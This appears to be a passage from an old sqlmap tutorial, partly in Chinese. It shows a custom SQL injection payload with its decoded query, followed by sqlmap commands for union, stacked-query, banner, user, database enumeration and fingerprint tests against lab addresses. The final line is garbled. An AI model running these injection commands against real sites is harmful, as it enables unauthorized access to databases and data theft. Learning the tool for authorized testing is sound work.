92.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter id is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1) AND 7433=7433 AND (test=test
and makes the query syntatically correct to the page query:
SELECT * FROM users WHERE id=(1) AND 7433=7433 AND (test=test) LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
页面比较
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php id=1" --regexp " | lu[w][w]er" -v
排除网站的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php id=1" --excl-reg "Dynamic content: ([d]+)"
多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php id=1" --stacked-test -v 1
union注入测试
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php id=1" --union-test -v 1
unionz注入配合orderby
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php id=1" --union-test --union-tech orderby -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php id=1" -v 1 --union-use --dbs
fingerprint
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php id=1" -v 1 -f
python sqlmap.py -u "asp name=luther">http://192.168.123.36/sqlmap
|